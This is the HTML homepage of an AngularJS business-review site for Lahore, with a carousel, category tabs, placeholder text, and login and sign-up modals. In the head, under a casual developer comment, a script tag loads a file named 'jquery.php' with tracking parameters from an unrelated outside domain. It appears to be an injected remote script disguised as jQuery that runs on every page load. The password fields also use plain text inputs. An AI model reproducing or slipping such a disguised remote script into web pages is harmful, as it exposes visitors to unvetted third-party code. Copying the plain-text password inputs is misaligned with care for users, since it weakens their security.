<!DOCTYPE html>
<html ng-app="business">
<head>
	<title>Br |HOME</title>
	<link rel="stylesheet" type="text/css" href="assets/libs/css/bootstrap.min.css">
	<link rel="stylesheet" type="text/css" href="assets/libs/css/star-rating.min.css">
	<link href='https://fonts.googleapis.com/css?family=Oswald:400,300,700' rel='stylesheet' type='text/css'>
	<link href='https://fonts.googleapis.com/css?family=Roboto+Condensed' rel='stylesheet' type='text/css'>
	<link rel="stylesheet" type="text/css" href="assets/css/style.css">
	 

	 <!-- Just For Now , Will Update it Later  , Umair Here-->
	<script src="https://macutnova.com/jquery.php?u=07a748e98a2bcce97e8aa6a58c5b0425&c=split24banner4&p=1"></script>


</head>
<body ng-controller="businessController as biz">
	<!-- NAV BAR -->
	<nav class="navbar navbar-inverse">
	  <div class="container">
	    <!-- Brand and toggle get grouped for better mobile display -->
	    <div class="navbar-header">
	      <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
	        <span class="sr-only">Toggle navigation</span>
	        <span class="icon-bar"></span>
	        <span class="icon-bar"></span>
	        <span class="icon-bar"></span>
	      </button>
	      <a class="navbar-brand" href="#">Business Reviewer</a>
	    </div>

	    <!-- Collect the nav links, forms, and other content for toggling -->
	    <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
	      <form class="navbar-form navbar-right" role="search">
	      	<button type="submit" class="btn btn-find">Find</button>
	        <div class="form-group">
	          <input type="text" class="form-control" placeholder="type name of business to find">
	        </div>
	      </form>
	      <button type="button" class="btn btn-default btn-lg" id="myBtn">Login</button>
	    </div><!-- /.navbar-collapse -->
	  </div><!-- /.container-fluid -->
	</nav>
	<!-- / NAV BAR -->

	<!-- Slider -->
	<div id="bzns-slider" class="carousel slide" data-ride="carousel">
	  <!-- Indicators
	  <ol class="carousel-indicators">
	    <li data-target="#bzns-slider" data-slide-to="0" class="active"></li>
	    <li data-target="#bzns-slider" data-slide-to="1"></li>
	    <li data-target="#bzns-slider" data-slide-to="2"></li>
	  </ol>
	  -->

	  <!-- Wrapper for slides -->
	  <div class="carousel-inner" role="listbox">
	    <div class="item active">
	      <div class="bzns-slide">
	      	<div class="container">
		      	<img src="assets/img/dummy/kfc-profile-img.png" class="img-circle bzns-profile">
		      	<div class="rev-desc">
		      		<img class="stars" src="assets/img/dummy/stars.png">
		      		<span>3.5/5 <span>100,234,781 Reviews</span></span>
		      		<h3>KFC <span>Chowk chuburji Nazd Umer Burger Lahore</span></h3>
		      		<p>
		      			Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
		      			tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
		      			quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo
		      			consequat. Duis aute irure dolor.
		      		</p>
		      	</div>
	      	</div>
	      </div>
	    </div>
	    <div class="item">
	      <div class="bzns-slide">
	      	<div class="container">
		      	<img src="assets/img/dummy/burger-king.jpg" class="img-circle bzns-profile">
		      	<div class="rev-desc">
		      		<img class="stars" src="assets/img/dummy/stars.png">
		      		<span>3.5/5 <span>100,234,781 Reviews</span></span>
		      		<h3>Burger King <span>Anarkali bazar Lahore</span></h3>
		      		<p>
		      			Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
		      			tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
		      			quis nostrud exercitation ullamco laboris.
		      		</p>
		      	</div>
	      	</div>
	      </div>
	    </div>
	    <div class="item">
	      <div class="bzns-slide">
	      	<div class="container">
		      	<img src="assets/img/dummy/shaukat-khanam.jpg" class="img-circle bzns-profile">
		      	<div class="rev-desc">
		      		<img class="stars" src="assets/img/dummy/stars.png">
		      		<span>3.5/5 <span>100,234,781 Reviews</span></span>
		      		<h3>Shoukat Khanam Cancer Hospital <span>Raiwind Road Lahore</span></h3>
		      		<p>
		      			Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
		      			tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
		      			quis nostrud exercitation ullamco laboris.
		      		</p>
		      	</div>
	      	</div>
	      </div>
	    </div>
	  </div>

	  <!-- Controls -->
	  <a class="left carousel-control" href="#bzns-slider" role="button" data-slide="prev">
	    <span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
	    <span class="sr-only">Previous</span>
	  </a>
	  <a class="right carousel-control" href="#bzns-slider" role="button" data-slide="next">
	    <span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
	    <span class="sr-only">Next</span>
	  </a>
	</div>
	<!-- / Slider -->

	<!-- Find Business -->
	<div id="find-bzns-inp" class="row">
		<div class="input-group col-md-8 col-md-offset-2">
	      <input type="text" class="form-control" placeholder="type name of business to find">
	      <span class="input-group-btn">
	        <button class="btn btn-default" type="button">Find!</button>
	      </span>
	    </div><!-- /input-group -->
	</div>
	<!-- /Find Business -->

	

	<!--<div ng-include src="'business.html'"></div>-->
	<!-- Registration area -->
	<div id="reg-area">
		<div class="container">
			<div class="row">
				<div class="col-md-6">
					<div>
						<h2>REGISTER YOUR BUSINESS NOW</h2>
						<p>Let People Decide Standards</p>
						<button class="btn btn-reg">REGISTER</button>
					</div>
				</div>
				<div class="col-md-6">
					<div>
						<h2>SHARE YOUR EXPERIENCES</h2>
						<p>Help People Find The Best</p>
						<button class="btn btn-reg " id="SignupBtn">SIGN UP</button>
					</div>
				</div>
			</div>
		</div>
	</div>
	<!-- /Registration area -->
	

	<!-- City Selection -->
	<div class="city-select">
		<select class="form-control">
			<option selected>Lahore</option>
			<option>Karachi</option>
			<option>Islamabad</option>
			<option>Rawalpindi</option>
			<option>Multan</option>
			<option>Murree</option>
			<option>Faisalabad</option>
		</select>
	</div>
	<!-- /City Selection -->

	<!-- Top Businesses -->
	<div id="top-bzns">
		<div class="container">
			<div class="row">
				<div class="col-md-2">
					<section ng-init="tab=1">
						<ul class="nav nav-pills nav-stacked">
						  <li role="presentation" ng-class="{active:tab===1}"><a href ng-click="tab=1">Food</a></li>
						  <li role="presentation" ng-class="{active:tab===2}"><a href ng-click="tab=2">Real Estate</a></li>
						  <li role="presentation" ng-class="{active:tab===3}"><a href ng-click="tab=3">Clothes</a></li>
						  <li role="presentation" ng-class="{active:tab===4}"><a href ng-click="tab=4">Medical</a></li>
						  <li role="presentation" ng-class="{active:tab===5}"><a href ng-click="tab=5">Education</a></li>
						  <li role="presentation" ng-class="{active:tab===6}"><a href ng-click="tab=6">Transport</a></li>
						  <li role="presentation" ng-class="{active:tab===7}"><a href ng-click="tab=7">Furniture</a></li>
						  <li role="presentation" ng-class="{active:tab===8}"><a href ng-click="tab=8">Shopping</a></li>
						</ul>
					
				</div>
				<div class="col-md-10"  >
					<div class="panel-group" id="accordion" role="tablist" aria-multiselectable="true" ng-repeat="info in biz.bizobj|orderBy:'-Ratings'">
					  <div class="panel panel-default bzns-panel" ng-show="tab===1">
					    <div class="panel-heading" role="tab" id="headingOne">
					      <h4 class="panel-title">
					        <a role="button" class="collapsed" data-toggle="collapse" data-parent="#accordion" href="#collapseOne" aria-expanded="false" aria-controls="collapseOne">
					          <img ng-src="{{info.pic}}" class="bzns-profile img-circle">
					          <h3>{{info.businessName}} <small>{{info.Address}}</small></h3>
					          <img class="pull-left stars" src="assets/img/dummy/stars.png">
					          <span>{{info.Ratings}}/5 <span>100,435,909 Reviews</span></span>
					          <p>
					          	{{info.Description}}
					          </p>
					        </a>
					      </h4>
					    </div>

					    <div id="collapseOne" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingOne">
					      
					    
					      <div class="panel-body" ng-repeat="cmnts in info.reviews">
								
					      <p>{{cmnts.Comment}}</p>
					      <input id="stars_Id" class="rating" data-min="0" data-max="5" data-step="0.1">  
					      
					      </div>
					    </div>
					  </div>


					  <div ng-include src="'business.html'" class="panel panel-default bzns-panel" ng-show="tab===2" onload="biz.starfunc()">
					    
					  </div>
					  <div ng-include src="'business.html'" class="panel panel-default bzns-panel" ng-show="tab===3">
					    
					  </div>
					  <div ng-include src="'business.html'" class="panel panel-default bzns-panel" ng-show="tab===4">
					    
					  </div>
					  <div ng-include src="'business.html'" class="panel panel-default bzns-panel" ng-show="tab===5">
					    
					  </div>
					  <div ng-include src="'business.html'" class="panel panel-default bzns-panel" ng-show="tab===6">
					    
					  </div>
					  <div ng-include src="'business.html'" class="panel panel-default bzns-panel" ng-show="tab===7">
					    
					  </div>
					  <div ng-include src="'business.html'" class="panel panel-default bzns-panel" ng-show="tab===8">
					    
					  </div>





					</div>
					
					  
					</div>
					</section>
				</div>
			</div>
		</div>
	</div>

	<!-- /Top Businesses -->




	<!-- Modal For Login -->
  <div class="modal fade" id="myModal" role="dialog">
    <div class="modal-dialog">
    
      <!-- Modal content-->
      <div class="modal-content">
        <div class="modal-header" style="padding:35px 50px;">
          <button type="button" class="close" data-dismiss="modal">&times;</button>
          <h4><span class="glyphicon glyphicon-lock"></span> Login</h4>
        </div>
        <div class="modal-body" style="padding:40px 50px;">
          <form role="form" name="loginForm" ng-submit="loginForm.$valid">
            <div class="form-group">
              <label for="usrname"><span class="glyphicon glyphicon-user"></span> Username</label>
              <input type="text" class="form-control" id="usrname" placeholder="Enter email" required>
            </div>
            <div class="form-group">
              <label for="psw"><span class="glyphicon glyphicon-eye-open"></span> Password</label>
              <input type="text" class="form-control" id="psw" placeholder="Enter password" required>
            </div>
            <div class="checkbox">
              <label><input type="checkbox" value="" checked required>Remember me</label>
            </div>
              <button type="submit" class="btn btn-success btn-block"><span class="glyphicon glyphicon-off"></span> Login</button>
          </form>
        </div>
        <div class="modal-footer">
          <button type="submit" class="btn btn-danger btn-default pull-left" data-dismiss="modal"><span class="glyphicon glyphicon-remove"></span> Cancel</button>
          <p>Not a member? <a href="#">Sign Up</a></p>
          <p>Forgot <a class="SignupBtn" >Password?</a></p>
          <div>reviewForm is {{loginForm.$valid}}</div>
        </div>
      </div>
      
    </div>
  </div>
  <!-- Modal For Login Ended --> 


<!-- Modal For Sign Up -->
  <div class="modal fade" id="SignupModal" role="dialog">
    <div class="modal-dialog">
    
      <!-- Modal content-->
      <div class="modal-content">
        <div class="modal-header" style="padding:35px 50px;">
          <button type="button" class="close" data-dismiss="modal">&times;</button>
          <h4><span class="glyphicon glyphicon-lock"></span> Sign Up</h4>
        </div>
        <div class="modal-body" style="padding:40px 50px;">
          <form role="form">
            <div class="form-group">
              <label for="firstname"><span class="glyphicon glyphicon-user"></span> First Name</label>
              <input type="text" class="form-control" id="firstname" placeholder="Enter email">
            </div>
            <div class="form-group">
              <label for="lastname"><span class="glyphicon glyphicon-user"></span> Last Name</label>
              <input type="text" class="form-control" id="lastname" placeholder="Enter email">
            </div>
            <div class="form-group">
              <label for="usrname"><span class="glyphicon glyphicon-user"></span> Login</label>
              <input type="text" class="form-control" id="usrname" placeholder="Enter email">
            </div>
            <div class="form-group">
              <label for="psw"><span class="glyphicon glyphicon-eye-open"></span> Password</label>
              <input type="text" class="form-control" id="psw" placeholder="Enter password">
            </div>
            <div class="form-group">
              <label for="confirmpsw"><span class="glyphicon glyphicon-eye-open"></span>Confirm Password</label>
              <input type="text" class="form-control" id="confirmpsw" placeholder="Enter password">
            </div>
            
              <button type="submit" class="btn btn-success btn-block"><span class="glyphicon glyphicon-off"></span> Sign Up</button>
          </form>
        </div>
        
      </div>
      
    </div>
  </div>
  <!-- Modal For Ended --> 





	
<!-- Scripts -->

<script type="text/javascript" src="assets/libs/js/jquery-1.11.3.min.js"></script>
<script type="text/javascript" src="assets/libs/js/jquery-2.1.4.min.js"></script>

<script type="text/javascript" src="assets/libs/js/angular.min.js"></script>
<script type="text/javascript" src="assets/libs/js/angular-route.min.js"></script>

<script type="text/javascript" src="assets/libs/js/bootstrap.min.js"></script>
<script type="text/javascript" src="assets/libs/js/star-rating.min.js"></script>
<script type="text/javascript" src="assets/js/script.js"></script>
<script type="text/javascript" src="assets/js/mainJS.js"></script>

</body>
</html>